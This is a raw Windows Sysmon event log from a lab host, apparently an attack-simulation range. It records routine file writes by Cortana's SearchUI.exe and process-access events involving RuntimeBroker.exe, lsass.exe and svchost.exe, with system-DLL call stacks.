13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.851{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt2021-01-18 13:58:34.851 11241100x800000000000000011964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.851{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt2021-01-18 13:58:34.851 10341000x800000000000000011963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.773{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.773{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.679{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+14e60|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.398{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.398{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.398{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.398{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 